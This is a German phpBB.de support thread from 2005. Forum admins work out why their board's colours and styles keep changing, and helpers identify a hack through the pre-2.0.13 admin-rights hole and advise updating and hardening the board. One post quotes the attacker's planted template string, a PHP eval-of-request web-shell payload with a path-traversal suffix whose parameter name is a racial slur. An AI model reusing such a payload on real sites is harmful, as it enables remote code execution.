phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Einstellungen verändern sich

https://www.phpbb.de/community/viewtopic.php?t=83926

Seite 1 von 3

Einstellungen verändern sich

Verfasst: 14.04.2005 09:46
von Hypnoseland
Wir haben unser Forum mit ihrer Forum - Software ausgestattet.
die funktioniert so weit auch ziemlich gut.
Aber seit Kurzem erleben wir ein seltsames Phänomen.
Die Schrift -farben verändern sich selbsttätig.
Die Einstellungen mussten mühsam händisch zurück gestellt werden, ( Farbcode einzeln eingeben)doch einige Tage später war die Schrift wieder verstellt.
Können sie uns da helfen?
Wie ist so was möglich?

Verfasst: 14.04.2005 10:40
von Markus67
Hi ...

Wieviele User haben denn Adminrechte oder die FTP-Zugangsdaten? Und da werkelt wirklich sonst niemand rum der euch ärgern möchte ?

Wieviele Mitglieder hat das Forum ?

Markus

Verfasst: 14.04.2005 11:38
von punkface
Hypnoseland-Forum hat geschrieben:Powered by phpBB 2.0.11
phpBB 2.0.12 erschienen
phpBB 2.0.13 erschienen

Bis Version 2.0.13 kann sich jeder Adminrechte verschaffen, und somit lustig die Einstellunge verändern, ein Update wär daher nicht schlecht.

siehe:
Update-Hilfe für den Fall dass keine MODs installiert sind

falls ihr MODs installiert habt:
[Tool] phpBB 2.0.11/12 to phpBB 2.0.13 Code Changes

Wenn nach dem Update im Adminbereich die falsche Versionsnummer angezeigt wird: Update der Versionsnummer

Als nächstes solltet ihr in der Datenbanktabelle phpbb_users (Prefix (phpbb_) kann bei euch ein anderer sein) schauen, welche Benutzer Userlevel 1 haben, und ggf. wieder auf 0 zurücksetzten.


Dann wär noch zu empfehlen, dass ihr hier den phpbb.com Newsletters bestellt, und auch in Zukunft öfters mal hier auf phpbb.de (vorallem im Forum Ankündigungen und Neuigkeiten) vorbei schaut, um euch über neue Updates zu informieren.

Und zum Schluss solltet ihr mal folgenden Beitrag durchlesen: So mache ich mein Board sicher

Ich glaub das war alles :)

Verfasst: 14.04.2005 11:40
von Hypnoseland
Hallo Markus,

Danke für Deine schnelle Antwort :-)

Unser Forum ist mit 72 Mitgliedern noch recht klein, davon haben 3 Personen Admin-Rechte, Elmar, ich und eine weitere Person.
Die FTP-Zugangsdaten hat außer uns beiden niemand.

Wir haben uns untereinander abgesprochen - niemand hat an der Farbgestaltung etwas verändert.
Installiert ist das Standard-Style SubSilver, bei dem wir die Farben von blau in grün verändert haben (ohne css, weil wir uns damit leider nicht auskennen).

Während ich eine Woche in Urlaub war, haben sich die Farben in dieser Zeit wie "von Geisterhand" verändert.
Auffällig ist, dass dabei die Standard-Schriftfarben von SubSilver wieder hergestellt wurden.

Ich habe am Montag alles mühevoll wieder gerichtet, wieder unsere üblich grüne Schrift eingestellt - seit heute Morgen sind wieder die Standardfarben von SubSilver da (Links blau, wenn man mit der Maus draufzeigt, orange, restl. kleine Schrift schwarz).

Verfasst: 14.04.2005 11:49
von punkface
Für den Fall das ihr/du meinen Beitrag jetzt übersehen habt und jetzt die ganze Zeit auf eine Antwort von Markus wartet: http://www.phpbb.de/viewtopic.php?p=473715#473715 :D

Verfasst: 14.04.2005 11:56
von Hypnoseland
punkface hat geschrieben: Als nächstes solltet ihr in der Datenbanktabelle phpbb_users (Prefix (phpbb_) kann bei euch ein anderer sein) schauen, welche Benutzer Userlevel 1 haben, und ggf. wieder auf 0 zurücksetzten.

Hallo Punkface,

vielen Dank auch für Deine Antwort :-)

Mit ein wenig Suchen hab ich doch tatsächlich diese Angaben in der Datenbank gefunden - interessant.

Bei den 3 Admins steht Userlevel 1, bei den Moderatoren steht Userlevel 2, alle übrigen normalen Mitglieder haben eine null darin stehen.


Muss es sich auf jeden Fall um eine manuelle Änderung gehandelt haben?
Komisch finde ich, dass bei 2 x verändern jeweils die gleichen Farben dabei rumkamen - nämlich die SubSilver Standardfarben

Verfasst: 14.04.2005 11:58
von Hypnoseland
punkface hat geschrieben:Für den Fall das ihr/du meinen Beitrag jetzt übersehen habt und jetzt die ganze Zeit auf eine Antwort von Markus wartet: http://www.phpbb.de/viewtopic.php?p=473715#473715 :D


Hallo Punkface,

unsere beiden Beiträge haben sich überschnitten. In den beiden Minuten, wo Deiner erschien, war ich an meinem noch am schreiben und hab Dir eben, während Du diesen Beitrag verfasst hast, auch schon geantwortet :-)

Verfasst: 14.04.2005 12:16
von punkface
Hypnoseland hat geschrieben:Bei den 3 Admins steht Userlevel 1, bei den Moderatoren steht Userlevel 2, alle übrigen normalen Mitglieder haben eine null darin stehen.
Wenn nur die drei Admins eine 1 bei Userlevel drin stehen haben, die von dir bestimmt sind, ist ja alles bestens, und kannst alles in der Datenbank so lassen wie es jetzt ist. :)
Hypnoseland hat geschrieben:Muss es sich auf jeden Fall um eine manuelle Änderung gehandelt haben?
Also wenn ich das richtig verstanden hab, gibt es bis Version 2.0.13 eine Sicherheitslücke die es jedem Benutzer erlaubt, durch anpassen des Cookies, Adminrechte zu bekommen. Der/Die jenige der/die das macht hat also Adminrechte, aber in der Datenbank steht nichts davon (von wegen Userlevel 1 und so). Nur wenn dieser Benutzer dann im Adminbereich sein eigene Befugnisse auf Admin stellt, hat er auch in der Datenbank das Userlevel 1 . Das heißt, auch wenn in der Datenbank alles so aussieht, als ob es nur die 3 von dir bestimmten Admins gibt, kann es trotzdem viel mehr Benutzer geben, die auch Adminrechte haben. (Falls ich da falsch liegen sollte, berichtigt mich) Deswegen ist ein Update wichtig.. siehe Links im ersten Beitrag. :)
unsere beiden Beiträge haben sich überschnitten. In den beiden Minuten, wo Deiner erschien, war ich an meinem noch am schreiben und hab Dir eben, während Du diesen Beitrag verfasst hast, auch schon geantwortet
:D

Verfasst: 14.04.2005 13:12
von Hypnoseland
Hallo nochmal,

mir ist noch etwas "Kurioses" aufgefallen.

Ich wollte soeben mal wieder die korrekten Farben wiederherstellen, als mir auffällt, dass unser zusätzliches Style "Classic" verschwunden ist und stattdessen 2 andere Styles da sind...

Eines davon kann zwar ausgewählt und bearbeitet/gelöscht werden, jedoch steht weder unter Style noch unter Template ein Name (diese beiden Felder sind leer).
Bei dem anderen, fremden Style steht unter Style der Name "FI Black" und bei Template steht

Code: Alles auswählen

aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp
Wenn man eines dieser beiden Styles auswählt, kann man sich mit seinem Usernamen anschließend nicht mehr einloggen, dann kommt als Fehlermeldung:

Code: Alles auswählen

phpBB : Kritischer Fehler 

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 345
File : /home/xxxx/www/home/forum/includes/functions.php )
jemand mit Admin-Funktion muss dann im Profil desjenigen den Style wieder ändern.

Das war diese Tage genau so (hatte ich vorhin vergessen zu schreiben, fiel mir erst jetzt wieder ein, wo ich das beim Ändern wollen gesehen habe) - ich hatte beide Styles gelöscht und das Classic wieder hinzugefügt.

Verfasst: 14.04.2005 13:49
von Markus67
Hi ...

Suche mal im Forum nach nigga ... da seid ihr nicht die ersten die es erwischt.
KB:gehackt.

Führe möglichst schnell das Update auf die 2.0.13 durch wie von Punkface schon beschrieben.

Zusätzlich solltest du das hier installieren ...
Zusätzlicher Schutz des phpBB-Verzeichnisses durch .htaccess

Hast du irgendwelche MOD's in das Forum eingebaut ?

Markus
Alle Zeiten sind UTC+02:00
Seite 1 von 3

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de